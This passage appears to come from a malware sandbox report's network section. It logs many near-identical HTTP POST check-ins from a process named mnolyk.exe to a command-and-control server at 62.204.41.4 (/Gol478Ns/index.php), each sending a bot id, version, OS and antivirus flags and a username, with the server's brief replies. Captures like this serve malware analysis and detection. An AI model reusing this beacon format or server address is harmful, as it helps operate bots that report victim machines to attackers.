                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:10.023943901 CET717INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:09 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      265192.168.2.74999262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:10.200128078 CET718OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:10.267174006 CET718INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:10 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      266192.168.2.74999362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:10.446984053 CET719OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:10.509741068 CET719INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:10 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      267192.168.2.74999462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:10.684632063 CET720OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:10.749183893 CET720INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:10 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      268192.168.2.74999562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:11.226044893 CET721OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:11.294483900 CET721INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:11 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      269192.168.2.74999662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:11.560688972 CET722OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:11.626969099 CET722INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:11 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      27192.168.2.74975162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:04.175860882 CET459OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:04.240720034 CET459INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:04 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      270192.168.2.74999762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:12.438412905 CET723OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:12.506864071 CET723INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:12 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      271192.168.2.74999862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:12.834460020 CET724OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:12.898948908 CET724INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:12 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      272192.168.2.74999962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:14.145160913 CET725OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:14.210385084 CET725INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:14 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      273192.168.2.75000062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:14.484343052 CET726OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:14.549825907 CET726INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:14 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      274192.168.2.75000162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:14.735616922 CET727OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:14.800014973 CET727INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:14 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      275192.168.2.75000262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:14.985690117 CET728OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:15.052015066 CET728INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:15 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      276192.168.2.75000362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:15.250782967 CET729OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:15.315639019 CET729INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:15 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      277192.168.2.75000462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:15.494599104 CET730OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:15.559858084 CET730INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:15 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      278192.168.2.75000562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:15.731218100 CET731OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:15.797847986 CET731INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:15 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      279192.168.2.75000662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:15.979490995 CET732OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:16.047143936 CET732INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:16 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      28192.168.2.74975262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:04.410535097 CET460OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:04.474786043 CET460INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:04 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      280192.168.2.75000762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:16.259881020 CET733OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:16.324100971 CET733INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:16 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      281192.168.2.75000862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:16.510742903 CET734OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:16.574184895 CET734INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:16 GMT
                                                                      Content-Type: text/html; charset=UTF-8
